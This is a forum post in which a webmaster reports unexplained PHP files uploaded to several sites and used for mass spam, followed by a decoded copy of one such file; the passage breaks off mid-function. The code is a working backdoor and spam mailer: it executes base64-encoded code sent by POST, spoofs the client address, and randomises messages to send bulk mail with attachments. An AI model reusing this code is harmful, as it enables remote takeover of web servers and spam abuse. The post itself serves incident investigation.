Random PHP and Email Spam

c0nfus3d1

I keep getting some random PHP files appearing in the public_html folder of a few different domains... These files are somehow getting remotely uploaded and then being used to send mass spam.

I'm still doing some investigation, whether it's the code running the sites or a server security issue, or whatever... but I'm curious if anyone else has any experience with this?

I've decoded the latest PHP file (it was written in HEX) and if you wrote this? I officially hate you.

The cached original version is at http://ddecode.com/hexdecoder/?results=3233e0a58699c45573f2889109cfb31a

The decoded and formatted version is:

Code:
<?php
${"GLOBALS"}["mqlebyzvmj"]   = "k";
${"GLOBALS"}["plfpgtb"]      = "h_detected";
${"GLOBALS"}["gcjhotz"]      = "headers";
${"GLOBALS"}["voftntvv"]     = "res";
${"GLOBALS"}["yhdqjv"]       = "data";
${"GLOBALS"}["beratloij"]    = "v";
${"GLOBALS"}["wtdppktf"]     = "cookie";
${"GLOBALS"}["mxbdjl"]       = "request";
${"GLOBALS"}["fcqooern"]     = "timeout";
${"GLOBALS"}["kqhynkswjz"]   = "errstr";
${"GLOBALS"}["cksuzuqvwc"]   = "errno";
${"GLOBALS"}["doljyffriysx"] = "fp";
${"GLOBALS"}["sxlttdn"]      = "scheme";
${"GLOBALS"}["lvckjtabxs"]   = "url";
${"GLOBALS"}["icgdbvfx"]     = "params";
${"GLOBALS"}["qfeyefuqe"]    = "uri";
${"GLOBALS"}["hqssdilo"]     = "tokens";
${"GLOBALS"}["veppxwjrh"]    = "str";
${"GLOBALS"}["hxkfxrxpenqh"] = "pass";
${"GLOBALS"}["sjukfuepbh"]   = "length";
${"GLOBALS"}["uclidfi"]      = "chars";
${"GLOBALS"}["apafoidgmzuu"] = "num";
${"GLOBALS"}["xscxjex"]      = "count";
${"GLOBALS"}["nbnesbn"]      = "rand";
${"GLOBALS"}["xfpfxyiictp"]  = "max";
${"GLOBALS"}["dmlbmh"]       = "min";
${"GLOBALS"}["apfobrq"]      = "content";
${"GLOBALS"}["jisnvrn"]      = "c2";
${"GLOBALS"}["fejuvwsrls"]   = "ns";
${"GLOBALS"}["fybqbrtn"]     = "i";
${"GLOBALS"}["lbolyfxnivk"]  = "matches";
${"GLOBALS"}["bbvdpmjvhexf"] = "subj";
${"GLOBALS"}["vstpgeejdqiw"] = "to";
${"GLOBALS"}["uyhrcpj"]      = "f";
${"GLOBALS"}["npbqykmfn"]    = "un";
${"GLOBALS"}["xszxrwvmbo"]   = "zag";
${"GLOBALS"}["kxrtvutigv"]   = "plain";
${"GLOBALS"}["aqgqoaggxh"]   = "head";
${"GLOBALS"}["zuusolg"]      = "from";
${"GLOBALS"}["fvrlut"]       = "messages";
${"GLOBALS"}["wdweims"]      = "message";
${"GLOBALS"}["qwjrjo"]       = "theme";
${"GLOBALS"}["kvijmeebjwjy"] = "filename";
${"GLOBALS"}["dsjfolgnodv"]  = "file";
${"GLOBALS"}["ryqwhdlooof"]  = "aliases";
${"GLOBALS"}["fgniwq"]       = "mailers";
${"GLOBALS"}["ydxffto"]      = "themes";
${"GLOBALS"}["cintvgc"]      = "emails";
${"GLOBALS"}["byypcuyk"]     = "key";
if (isset($_POST["code"]) && isset($_POST["custom_action"])) {
    eval(base64_decode($_POST["code"]));
}
if (isset($_POST["type"]) && $_POST["type"] == "1") {
    type1_send();
} elseif (isset($_POST["type"]) && $_POST["type"] == "2") {
} elseif (isset($_POST["type"])) {
    echo $_POST["type"];
}
function type1_send( )
{
    $escikxlrj                  = "messages";
    ${"GLOBALS"}["umdgowyukvx"] = "fteil";
    if (!isset($_POST["emails"]) OR !isset($_POST["themes"]) OR !isset($_POST["messages"]) OR !isset($_POST["froms"]) OR !isset($_POST["mailers"])) {
        exit( );
    }
    if (get_magic_quotes_gpc()) {
        $pdniulpzjg = "post";
        foreach ($_POST as ${${"GLOBALS"}["byypcuyk"]} => ${$pdniulpzjg}) {
            $nnyfljh                            = "post";
            $_POST[${${"GLOBALS"}["byypcuyk"]}] = stripcslashes(${$nnyfljh});
        }
    }
    ${"GLOBALS"}["lklrkotq"]        = "emails";
    ${"GLOBALS"}["wcoqaksohrie"]    = "froms";
    $vuoyllxk                       = "passes";
    $gajjboiolb                     = "email";
    ${${"GLOBALS"}["cintvgc"]}      = @unserialize(base64_decode($_POST["emails"]));
    ${${"GLOBALS"}["ydxffto"]}      = @unserialize(base64_decode($_POST["themes"]));
    ${$escikxlrj}                   = @unserialize(base64_decode($_POST["messages"]));
    ${${"GLOBALS"}["wcoqaksohrie"]} = @unserialize(base64_decode($_POST["froms"]));
    ${${"GLOBALS"}["fgniwq"]}       = @unserialize(base64_decode($_POST["mailers"]));
    ${${"GLOBALS"}["ryqwhdlooof"]}  = @unserialize(base64_decode($_POST["aliases"]));
    ${$vuoyllxk}                    = @unserialize(base64_decode($_POST["passes"]));
    if (isset($_SERVER)) {
        $_SERVER["PHP_SELF"]    = "/";
        $_SERVER["REMOTE_ADDR"] = "127.0.0.1";
        if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
            $_SERVER["HTTP_X_FORWARDED_FOR"] = "127.0.0.1";
        }
    }
    if (isset($_FILES)) {
        foreach ($_FILES as ${${"GLOBALS"}["byypcuyk"]} => ${${"GLOBALS"}["dsjfolgnodv"]}) {
            $tbmisfvl                                      = "filename";
            $vjfajwgqfgv                                   = "aliases";
            $zsigtbqc                                      = "filename";
            ${"GLOBALS"}["tcvdyuooqtf"]                    = "filename";
            ${"GLOBALS"}["xespolekf"]                      = "filename";
            ${$tbmisfvl}                                   = alter_macros(${$vjfajwgqfgv}[${${"GLOBALS"}["byypcuyk"]}]);
            ${${"GLOBALS"}["kvijmeebjwjy"]}                = num_macros(${${"GLOBALS"}["xespolekf"]});
            ${$zsigtbqc}                                   = text_macros(${${"GLOBALS"}["kvijmeebjwjy"]});
            ${"GLOBALS"}["zllrfyqlzd"]                     = "key";
            ${${"GLOBALS"}["tcvdyuooqtf"]}                 = xnum_macros(${${"GLOBALS"}["kvijmeebjwjy"]});
            $_FILES[${${"GLOBALS"}["zllrfyqlzd"]}]["name"] = ${${"GLOBALS"}["kvijmeebjwjy"]};
        }
    }
    if (empty(${${"GLOBALS"}["lklrkotq"]})) {
        exit( );
    }
    foreach (${${"GLOBALS"}["cintvgc"]} as ${${"GLOBALS"}["umdgowyukvx"]} => ${$gajjboiolb}) {
        ${"GLOBALS"}["dumoukrytq"]      = "theme";
        ${"GLOBALS"}["iiruieywjq"]      = "message";
        $wservwqqn                      = "theme";
        ${"GLOBALS"}["vsrutkuwiske"]    = "from";
        ${${"GLOBALS"}["dumoukrytq"]}   = ${${"GLOBALS"}["ydxffto"]}[array_rand(${${"GLOBALS"}["ydxffto"]})];
        $vtzzcfh                        = "message";
        ${${"GLOBALS"}["qwjrjo"]}       = alter_macros(${$wservwqqn}["theme"]);
        $reskpoq                        = "mailers";
        $qlddgikwl                      = "message";
        $uzxokgywpz                     = "theme";
        ${${"GLOBALS"}["qwjrjo"]}       = num_macros(${${"GLOBALS"}["qwjrjo"]});
        ${"GLOBALS"}["agqwsofchcw"]     = "mailer";
        ${"GLOBALS"}["lhagsrk"]         = "from";
        ${$uzxokgywpz}                  = text_macros(${${"GLOBALS"}["qwjrjo"]});
        $zpddcmhvkqr                    = "messages";
        ${"GLOBALS"}["mbihuby"]         = "message";
        ${"GLOBALS"}["sqqhlsnwuhy"]     = "from";
        ${"GLOBALS"}["lvvmsotthrg"]     = "message";
        ${${"GLOBALS"}["qwjrjo"]}       = xnum_macros(${${"GLOBALS"}["qwjrjo"]});
        ${${"GLOBALS"}["wdweims"]}      = ${$zpddcmhvkqr}[array_rand(${${"GLOBALS"}["fvrlut"]})];
        ${${"GLOBALS"}["wdweims"]}      = alter_macros(${${"GLOBALS"}["wdweims"]}["message"]);
        ${${"GLOBALS"}["mbihuby"]}      = num_macros(${${"GLOBALS"}["iiruieywjq"]});
        $xngjqtj                        = "from";
        ${"GLOBALS"}["tvxnodjjy"]       = "message";
        $zvchak                         = "theme";
        ${${"GLOBALS"}["wdweims"]}      = text_macros(${${"GLOBALS"}["lvvmsotthrg"]});
        ${"GLOBALS"}["ygtidolzyz"]      = "mailer";
        $zzmbjtetlro                    = "froms";
        ${"GLOBALS"}["fsnqten"]         = "from";
        ${"GLOBALS"}["pusytimfhf"]      = "froms";
        ${${"GLOBALS"}["tvxnodjjy"]}    = xnum_macros(${$qlddgikwl});
        ${"GLOBALS"}["elqxcmdqx"]       = "fteil";
        ${"GLOBALS"}["rwtkfsrf"]        = "from";
        ${$vtzzcfh}                     = fteil_macros(${${"GLOBALS"}["wdweims"]}, ${${"GLOBALS"}["elqxcmdqx"]});
        ${${"GLOBALS"}["sqqhlsnwuhy"]}  = ${${"GLOBALS"}["pusytimfhf"]}[array_rand(${$zzmbjtetlro})];
        $hhmertb                        = "from";
        ${${"GLOBALS"}["fsnqten"]}      = alter_macros(${${"GLOBALS"}["rwtkfsrf"]}["from"]);
        ${"GLOBALS"}["snqullqgcsf"]     = "email";
        ${${"GLOBALS"}["vsrutkuwiske"]} = num_macros(${${"GLOBALS"}["zuusolg"]});
        ${${"GLOBALS"}["zuusolg"]}      = text_macros(${${"GLOBALS"}["zuusolg"]});
        ${${"GLOBALS"}["zuusolg"]}      = xnum_macros(${$xngjqtj});
        ${${"GLOBALS"}["lhagsrk"]}      = from_host(${$hhmertb});
        ${${"GLOBALS"}["ygtidolzyz"]}   = ${$reskpoq}[array_rand(${${"GLOBALS"}["fgniwq"]})];
        send_mail(${${"GLOBALS"}["zuusolg"]}, ${${"GLOBALS"}["snqullqgcsf"]}, ${$zvchak}, ${${"GLOBALS"}["wdweims"]}, ${${"GLOBALS"}["agqwsofchcw"]});
    }
}
function send_mail($from, $to, $subj, $text, $mailer)
{
    ${"GLOBALS"}["qkeivd"]     = "head";
    ${"GLOBALS"}["uvndnu"]     = "head";
    $qapomxejc                 = "head";
    ${"GLOBALS"}["qydrmrm"]    = "un";
    $ssjdvmr                   = "head";
    ${"GLOBALS"}["qapalf"]     = "un";
    ${"GLOBALS"}["fbmjilbxuh"] = "un";
    ${${"GLOBALS"}["qkeivd"]}  = "";
    ${${"GLOBALS"}["qydrmrm"]} = strtoupper(uniqid(time()));
    ${"GLOBALS"}["pihghp"]     = "plain";
    ${"GLOBALS"}["tiovdug"]    = "head";
    $zftiytqlm                 = "un";
    $dvusopo                   = "zag";
    ${$qapomxejc} .= "From: $from\n";
    ${${"GLOBALS"}["aqgqoaggxh"]} .= "X-Mailer: $mailer\n";
    ${"GLOBALS"}["xnacnkv"] = "zag";
    ${${"GLOBALS"}["aqgqoaggxh"]} .= "Reply-To: $from\n";
    ${${"GLOBALS"}["tiovdug"]} .= "Mime-Version: 1.0\n";
    ${${"GLOBALS"}["aqgqoaggxh"]} .= "Content-Type: multipart/alternative;";
    ${"GLOBALS"}["hdxvdvoguu"] = "text";
    ${${"GLOBALS"}["uvndnu"]} .= "boundary=\"----------" . ${${"GLOBALS"}["fbmjilbxuh"]} . "\"\n\n";
    ${${"GLOBALS"}["kxrtvutigv"]} = strip_tags(${${"GLOBALS"}["hdxvdvoguu"]});
    $udgbrojukp                   = "zag";
    ${${"GLOBALS"}["xszxrwvmbo"]} = "------------" . ${${"GLOBALS"}["npbqykmfn"]} . "\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    ${"GLOBALS"}["aumnkos"]       = "zag";
    ${$udgbrojukp} .= "Content-Transfer-Encoding: 7bit\n\n" . ${${"GLOBALS"}["pihghp"]} . "\n\n";
    ${${"GLOBALS"}["xszxrwvmbo"]} .= "------------" . ${${"GLOBALS"}["qapalf"]} . "\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    ${$dvusopo} .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    ${${"GLOBALS"}["aumnkos"]} .= "------------" . ${$zftiytqlm} . "--";
    if (count($_FILES) > 0) {
        foreach ($_FILES as ${${"GLOBALS"}["dsjfolgnodv"]}) {
            if (file_exists(${${"GLOBALS"}["dsjfolgnodv"]}["tmp_name"])) {
                $csikbuoamv                  = "un";
                ${"GLOBALS"}["jqtmtga"]      = "zag";
                ${"GLOBALS"}["jesjxulxr"]    = "f";
                $sdddwyyfvp                  = "zag";
                $bfwodwiv                    = "file";
                ${${"GLOBALS"}["jesjxulxr"]} = fopen(${$bfwodwiv}["tmp_name"], "rb");
                ${${"GLOBALS"}["xszxrwvmbo"]} .= "------------" . ${$csikbuoamv} . "\n";
                ${$sdddwyyfvp} .= "Content-Type: application/octet-stream;";
                ${${"GLOBALS"}["xszxrwvmbo"]} .= "name=\"" . ${${"GLOBALS"}["dsjfolgnodv"]}["name"] . "\"\n";
                ${"GLOBALS"}["dmdmxmo"] = "zag";
                ${${"GLOBALS"}["dmdmxmo"]} .= "Content-Transfer-Encoding:base64\n";
                $wfchmf = "file";
                ${${"GLOBALS"}["xszxrwvmbo"]} .= "Content-Disposition:attachment;";
                ${${"GLOBALS"}["jqtmtga"]} .= "filename=\"" . ${${"GLOBALS"}["dsjfolgnodv"]}["name"] . "\"\n\n";
                ${${"GLOBALS"}["xszxrwvmbo"]} .= chunk_split(base64_encode(fread(${${"GLOBALS"}["uyhrcpj"]}, filesize(${$wfchmf}["tmp_name"])))) . "\n";
                fclose(${${"GLOBALS"}["uyhrcpj"]});
            }
        }
    }
    if (@mail(${${"GLOBALS"}["vstpgeejdqiw"]}, ${${"GLOBALS"}["bbvdpmjvhexf"]}, ${${"GLOBALS"}["xnacnkv"]}, ${$ssjdvmr})) {
        if (!empty($_POST["verbose"]))
            echo "SENDED";
    } else {
        if (!empty($_POST["verbose"]))
            echo "FAIL";
    }
}
function alter_macros($content)
{
    $gfhdwrlfdbti = "content";
    $dbcqzuqfrub  = "i";
    $vljvwysj     = "matches";
    preg_match_all("#{(.*)}#Ui", ${$gfhdwrlfdbti}, ${${"GLOBALS"}["lbolyfxnivk"]});
    for (${$dbcqzuqfrub} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${$vljvwysj}[1]); ${${"GLOBALS"}["fybqbrtn"]}++) {
        $xkjlspskvkc                  = "rand";
        ${"GLOBALS"}["smqdfvdld"]     = "content";
        $nglxiujbxb                   = "ns";
        ${${"GLOBALS"}["fejuvwsrls"]} = explode("|", ${${"GLOBALS"}["lbolyfxnivk"]}[1][${${"GLOBALS"}["fybqbrtn"]}]);
        ${${"GLOBALS"}["jisnvrn"]}    = count(${$nglxiujbxb});
        ${"GLOBALS"}["kkdlher"]       = "rand";
        ${$xkjlspskvkc}               = rand(0, (${${"GLOBALS"}["jisnvrn"]} - 1));
        ${${"GLOBALS"}["apfobrq"]}    = str_replace("{" . ${${"GLOBALS"}["lbolyfxnivk"]}[1][${${"GLOBALS"}["fybqbrtn"]}] . "}", ${${"GLOBALS"}["fejuvwsrls"]}[${${"GLOBALS"}["kkdlher"]}], ${${"GLOBALS"}["smqdfvdld"]});
    }
    return ${${"GLOBALS"}["apfobrq"]};
}
function text_macros($content)
{
    $cgfmcd                  = "content";
    $bdxuity                 = "i";
    ${"GLOBALS"}["pcscgpyj"] = "matches";
    $ktojmubhbi              = "i";
    $lxkysix                 = "i";
    $ujoqcftky               = "matches";
    preg_match_all("#\\[TEXT\\-([[:digit:]]+)\-([[:digit:]]+)\\]#", ${$cgfmcd}, ${${"GLOBALS"}["pcscgpyj"]});
    for (${$bdxuity} = 0; ${$ktojmubhbi} < count(${${"GLOBALS"}["lbolyfxnivk"]}[0]); ${${"GLOBALS"}["fybqbrtn"]}++) {
        $prmvjorstbht                  = "matches";
        $qdzyect                       = "min";
        ${"GLOBALS"}["ycnufusujl"]     = "word";
        $xksiek                        = "i";
        ${${"GLOBALS"}["dmlbmh"]}      = ${$prmvjorstbht}[1][${${"GLOBALS"}["fybqbrtn"]}];
        ${${"GLOBALS"}["xfpfxyiictp"]} = ${${"GLOBALS"}["lbolyfxnivk"]}[2][${${"GLOBALS"}["fybqbrtn"]}];
        $spewortenoy                   = "rand";
        $wmnpnrq                       = "word";
        ${$spewortenoy}                = rand(${$qdzyect}, ${${"GLOBALS"}["xfpfxyiictp"]});
        ${"GLOBALS"}["pyiajtc"]        = "content";
        ${"GLOBALS"}["eurlpqt"]        = "matches";
        ${$wmnpnrq}                    = generate_word(${${"GLOBALS"}["nbnesbn"]});
        ${${"GLOBALS"}["pyiajtc"]}     = preg_replace("/" . preg_quote(${${"GLOBALS"}["eurlpqt"]}[0][${$xksiek}]) . "/", ${${"GLOBALS"}["ycnufusujl"]}, ${${"GLOBALS"}["apfobrq"]}, 1);
    }
    preg_match_all("#\\[TEXT\-([[:digit:]]+)\]#", ${${"GLOBALS"}["apfobrq"]}, ${$ujoqcftky});
    for (${$lxkysix} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${${"GLOBALS"}["lbolyfxnivk"]}[0]); ${${"GLOBALS"}["fybqbrtn"]}++) {
        ${"GLOBALS"}["lrxaolsi"]    = "content";
        $osbpusol                   = "word";
        $uhqpielodxx                = "matches";
        ${${"GLOBALS"}["xscxjex"]}  = ${$uhqpielodxx}[1][${${"GLOBALS"}["fybqbrtn"]}];
        ${$osbpusol}                = generate_word(${${"GLOBALS"}["xscxjex"]});
        $mgvbrau                    = "word";
        ${${"GLOBALS"}["lrxaolsi"]} = preg_replace("/" . preg_quote(${${"GLOBALS"}["lbolyfxnivk"]}[0][${${"GLOBALS"}["fybqbrtn"]}]) . "/", ${$mgvbrau}, ${${"GLOBALS"}["apfobrq"]}, 1);
    }
    return ${${"GLOBALS"}["apfobrq"]};
}
function xnum_macros($content)
{
    $pzpyjuxcpiy                = "matches";
    $xfajaeff                   = "matches";
    ${"GLOBALS"}["kioebekqiev"] = "i";
    preg_match_all("#\[NUM\-([[:digit:]]+)\]#", ${${"GLOBALS"}["apfobrq"]}, ${$pzpyjuxcpiy});
    for (${${"GLOBALS"}["fybqbrtn"]} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${$xfajaeff}[0]); ${${"GLOBALS"}["kioebekqiev"]}++) {
        ${"GLOBALS"}["wnnooc"]          = "matches";
        ${"GLOBALS"}["visitosnublp"]    = "max";
        ${"GLOBALS"}["whlqjtoorf"]      = "num";
        ${"GLOBALS"}["dmtfnwxztf"]      = "i";
        ${"GLOBALS"}["ewkbmqodngo"]     = "num";
        ${"GLOBALS"}["bmiuypczak"]      = "i";
        ${${"GLOBALS"}["whlqjtoorf"]}   = ${${"GLOBALS"}["wnnooc"]}[1][${${"GLOBALS"}["bmiuypczak"]}];
        ${"GLOBALS"}["oddzvpwlnl"]      = "rand";
        ${${"GLOBALS"}["dmlbmh"]}       = pow(10, ${${"GLOBALS"}["ewkbmqodngo"]} - 1);
        ${"GLOBALS"}["hlcslifsb"]       = "content";
        ${${"GLOBALS"}["visitosnublp"]} = pow(10, ${${"GLOBALS"}["apafoidgmzuu"]}) - 1;
        ${${"GLOBALS"}["oddzvpwlnl"]}   = rand(${${"GLOBALS"}["dmlbmh"]}, ${${"GLOBALS"}["xfpfxyiictp"]});
        ${${"GLOBALS"}["hlcslifsb"]}    = str_replace(${${"GLOBALS"}["lbolyfxnivk"]}[0][${${"GLOBALS"}["dmtfnwxztf"]}], ${${"GLOBALS"}["nbnesbn"]}, ${${"GLOBALS"}["apfobrq"]});
    }
    return ${${"GLOBALS"}["apfobrq"]};
}
function num_macros($content)
{
    ${"GLOBALS"}["ahxqhqnxa"]    = "matches";
    $uwpgtyucowo                 = "i";
    $amtlvbxk                    = "content";
    ${"GLOBALS"}["oovbkvy"]      = "matches";
    ${"GLOBALS"}["vxenbwwpdwql"] = "i";
    preg_match_all("#\[RAND\\-([[:digit:]]+)\\-([[:digit:]]+)\\]#", ${$amtlvbxk}, ${${"GLOBALS"}["ahxqhqnxa"]});
    for (${${"GLOBALS"}["vxenbwwpdwql"]} = 0; ${${"GLOBALS"}["fybqbrtn"]} < count(${${"GLOBALS"}["oovbkvy"]}[0]); ${$uwpgtyucowo}++) {
        $yyofcdnu                    = "matches";
        ${"GLOBALS"}["kzvejtns"]     = "content";
        $alqgklf                     = "min";
        $wdwojkxjn                   = "max";
        $auhylbfw                    = "max";
        $oqgcwrpw                    = "matches";
        ${${"GLOBALS"}["dmlbmh"]}    = ${$yyofcdnu}[1][${${"GLOBALS"}["fybqbrtn"]}];
        ${$auhylbfw}                 = ${${"GLOBALS"}["lbolyfxnivk"]}[2][${${"GLOBALS"}["fybqbrtn"]}];
        ${"GLOBALS"}["gqhkqoj"]      = "content";
        ${"GLOBALS"}["vqchgwrteuxr"] = "rand";
        ${${"GLOBALS"}["nbnesbn"]}   = rand(${$alqgklf}, ${$wdwojkxjn});
        ${${"GLOBALS"}["gqhkqoj"]}   = str_replace(${$oqgcwrpw}[0][${${"GLOBALS"}["fybqbrtn"]}], ${${"GLOBALS"}["vqchgwrteuxr"]}, ${${"GLOBALS"}["kzvejtns"]});
    }
    return ${${"GLOBALS"}["apfobrq"]};
}
function generate_word($length)
{
    ${"GLOBALS"}["fudsysewwc"]    = "chars";
    ${"GLOBALS"}["avqhwnqfh"]     = "string";
    ${${"GLOBALS"}["uclidfi"]}    = "abcdefghijklmnopqrstuvyxz";
    ${"GLOBALS"}["nytrgfbulv"]    = "string";
    $hwgkscqhbog                  = "numChars";
    ${"GLOBALS"}["nhlcrv"]        = "i";
    ${$hwgkscqhbog}               = strlen(${${"GLOBALS"}["fudsysewwc"]});
    $czmeeowy                     = "i";
    ${${"GLOBALS"}["nytrgfbulv"]} = "";
    for (${${"GLOBALS"}["nhlcrv"]} = 0; ${$czmeeowy} < ${${"GLOBALS"}["sjukfuepbh"]}; ${${"GLOBALS"}["fybqbrtn"]}++) {
        $cbktgugg                   = "string";
        ${"GLOBALS"}["yhutyoyarhu"] = "chars";
        $axigcqowche                = "numChars";
        ${$cbktgugg} .= substr(${${"GLOBALS"}["yhutyoyarhu"]}, rand(1, ${$axigcqowche}) - 1, 1);
    }
    return ${${"GLOBALS"}["avqhwnqfh"]};
}
function pass_macros($content, $passes)
{
    $dkntfvhb                       = "passes";
    ${${"GLOBALS"}["hxkfxrxpenqh"]} = array_pop(${$dkntfvhb});
    return str_replace("[PASS]", ${${"GLOBALS"}["hxkfxrxpenqh"]}, ${${"GLOBALS"}["apfobrq"]});
}
function fteil_macros($content, $fteil)
{
    $qbjfquydtw = "fteil";
    return str_replace("[FTEIL]", ${$qbjfquydtw}, ${${"GLOBALS"}["apfobrq"]});
}
function is_ip($str)
{
    return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}\$/", ${${"GLOBALS"}["veppxwjrh"]});
}
function from_host($content)
{
    $msfgiloyj = "tokens";
    $host      = preg_replace("/^(www|ftp)\\./i", "", @$_SERVER["HTTP_HOST"]);
    if (is_ip($host)) {
        ${"GLOBALS"}["ridbpirb"] = "content";
        return ${${"GLOBALS"}["ridbpirb"]};
    }
    ${${"GLOBALS"}["hqssdilo"]} = explode("@", ${${"GLOBALS"}["apfobrq"]});
    ${${"GLOBALS"}["apfobrq"]}  = ${$msfgiloyj}[0] . "@" . $host . ">";
    return ${${"GLOBALS"}["apfobrq"]};
}
function error_404( )
{
    $duvztk                      = "uri";
    ${${"GLOBALS"}["qfeyefuqe"]} = preg_replace("/(\\?).*\$/", "", $_SERVER["REQUEST_URI"]);
    ${${"GLOBALS"}["apfobrq"]}   = http_request("http://" . $_SERVER["SERVER_NAME"] . "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
    ${${"GLOBALS"}["apfobrq"]}   = str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", ${$duvztk}, ${${"GLOBALS"}["apfobrq"]});
    exit(${${"GLOBALS"}["apfobrq"]});
}
function http_request($params)
{
    ${"GLOBALS"}["nenohx"]     = "params";
    ${"GLOBALS"}["nwhkkxfzcy"] = "params";
    ${"GLOBALS"}["mqldimwdu"]  = "url";
    if (!is_array(${${"GLOBALS"}["nwhkkxfzcy"]})) {
        ${${"GLOBALS"}["icgdbvfx"]} = array(
            "url" => ${${"GLOBALS"}["icgdbvfx"]},
            "method" => "GET"
        );
    }
    ${"GLOBALS"}["vxijvekzi"]   = "params";
    ${"GLOBALS"}["rghyshvrgwe"] = "url";
    ${"GLOBALS"}["xyqxtbcoivz"] = "params";
    ${"GLOBALS"}["mqghnsid"]    = "params";
    ${"GLOBALS"}["whbkdajncyf"] = "url";
    $qsvullrdgijh               = "params";
    ${"GLOBALS"}["hpypjxrcfb"]  = "url";
    if (${${"GLOBALS"}["icgdbvfx"]}["url"] == "")
        return FALSE;
    $kartldnrdvp                 = "params";
    ${"GLOBALS"}["kdksoxo"]      = "params";
    ${"GLOBALS"}["hrixbsdqcqma"] = "res";
    if (!isset(${${"GLOBALS"}["nenohx"]}["method"]))
        ${${"GLOBALS"}["icgdbvfx"]}["method"] = (isset(${${"GLOBALS"}["icgdbvfx"]}["data"]) && is_array(${${"GLOBALS"}["kdksoxo"]}["data"])) ? "POST" : "GET";
    $tdngrnnmlr                            = "url";
    ${${"GLOBALS"}["vxijvekzi"]}["method"] = strtoupper(${${"GLOBALS"}["xyqxtbcoivz"]}["method"]);
    ${"GLOBALS"}["yrfwkkspku"]             = "url";
    $nwpfhvrsqvj                           = "port";
    if (!in_array(${$qsvullrdgijh}["method"], array(
        "GET",
        "POST"
    )))
        return FALSE;
    $ihxnlfpxdfd                  = "url";
    $lbspexnjsw                   = "url";
    $wgzlvxqfjizw                 = "url";
    ${${"GLOBALS"}["lvckjtabxs"]} = parse_url(${${"GLOBALS"}["icgdbvfx"]}["url"]);
    if (!isset(${${"GLOBALS"}["rghyshvrgwe"]}["scheme"]))
        ${${"GLOBALS"}["mqldimwdu"]}["scheme"] = "http";
    if (!isset(${${"GLOBALS"}["hpypjxrcfb"]}["path"]))
        ${$lbspexnjsw}["path"] = "/";
    if (!isset(${${"GLOBALS"}["whbkdajncyf"]}["host"]) && isset(${$tdngrnnmlr}["path"])) {
        if (strpos(${${"GLOBALS"}["lvckjtabxs"]}["path"], "/")) {
            $dwjvillu                             = "url";
            ${"GLOBALS"}["xthjzxk"]               = "url";
            ${$dwjvillu}["host"]                  = substr(${${"GLOBALS"}["lvckjtabxs"]}["path"], 0, strpos(${${"GLOBALS"}["lvckjtabxs"]}["path"], "/"));
            ${${"GLOBALS"}["lvckjtabxs"]}["path"] = substr(${${"GLOBALS"}["lvckjtabxs"]}["path"], strpos(${${"GLOBALS"}["xthjzxk"]}["path"], "/"));
        } else {
            ${"GLOBALS"}["kecbnuqkw"]             = "url";
            $dxnxasp                              = "url";
            ${${"GLOBALS"}["lvckjtabxs"]}["host"] = ${${"GLOBALS"}["kecbnuqkw"]}["path"];
            ${$dxnxasp}["path"]                   = "/";
        }
    }
    ${"GLOBALS"}["srhbwqvfli"]            = "url";
    ${"GLOBALS"}["krcdefut"]              = "res";
    ${${"GLOBALS"}["yrfwkkspku"]}["path"] = preg_replace("/[\/]+/", "/", ${${"GLOBALS"}["lvckjtabxs"]}["path"]);
    $ktskyr                               = "timeout";
    $ggyovxibtno                          = "url";
    $pmcvjns                              = "headers";
    if (isset(${$wgzlvxqfjizw}["query"]))
        ${${"GLOBALS"}["lvckjtabxs"]}["path"] .= "?{$url['query']}";
    ${"GLOBALS"}["llokaqyxtv"] = "url";
    $fdgdljzhrg                = "port";
    ${$nwpfhvrsqvj}            = isset(${${"GLOBALS"}["icgdbvfx"]}["port"]) ? ${${"GLOBALS"}["icgdbvfx"]}["port"] : (isset(${$ggyovxibtno}["port"]) ? ${$ihxnlfpxdfd}["port"] : (${${"GLOBALS"}["lvckjtabxs"]}["scheme"] == "https" ? 443 : 80));
    ${$ktskyr}                 = isset(${${"GLOBALS"}["icgdbvfx"]}["timeout"]) ? ${${"GLOBALS"}["mqghnsid"]}["timeout"] : 30;
    if (!isset(${${"GLOBALS"}["icgdbvfx"]}["return"]))
        ${$kartldnrdvp}["return"] = "content";
    ${${"GLOBALS"}["sxlttdn"]}      = ${${"GLOBALS"}["llokaqyxtv"]}["scheme"] == "https" ? "ssl://" : "";
    ${${"GLOBALS"}["doljyffriysx"]} = @fsockopen(${${"GLOBALS"}["sxlttdn"]} . ${${"GLOBALS"}["srhbwqvfli"]}["host"], ${$fdgdljzhrg}, ${${"GLOBALS"}["cksuzuqvwc"]}, ${${"GLOBALS"}["kqhynkswjz"]}, ${${"GLOBALS"}["fcqooern"]});
    if (${${"GLOBALS"}["doljyffriysx"]}) {
        ${"GLOBALS"}["szyxqtzcz"]   = "fp";
        ${"GLOBALS"}["ysihoboxrlp"] = "params";
        ${"GLOBALS"}["wsxrgoan"]    = "fp";
        ${"GLOBALS"}["ijrhgmjp"]    = "request";
        $rnwvskue                   = "params";
        if (!isset(${${"GLOBALS"}["icgdbvfx"]}["User-Agent"]))
            ${$rnwvskue}["User-Agent"] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
        ${"GLOBALS"}["dwbzzzujges"] = "request";
        ${"GLOBALS"}["ihvknvh"]     = "fp";
        ${"GLOBALS"}["reqvhywjsyc"] = "request";
        ${${"GLOBALS"}["ijrhgmjp"]} = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
        ${${"GLOBALS"}["dwbzzzujges"]} .= "Host: {$url['host']}\r\n";
        $ksctlofbdv = "params";
        $gjvppir    = "request";
        ${${"GLOBALS"}["mxbdjl"]} .= "User-Agent: {$params['User-Agent']}" . "\r\n";
        if (isset(${$ksctlofbdv}["referer"]))
            ${$gjvppir} .= "Referer: {$params['referer']}\r\n";
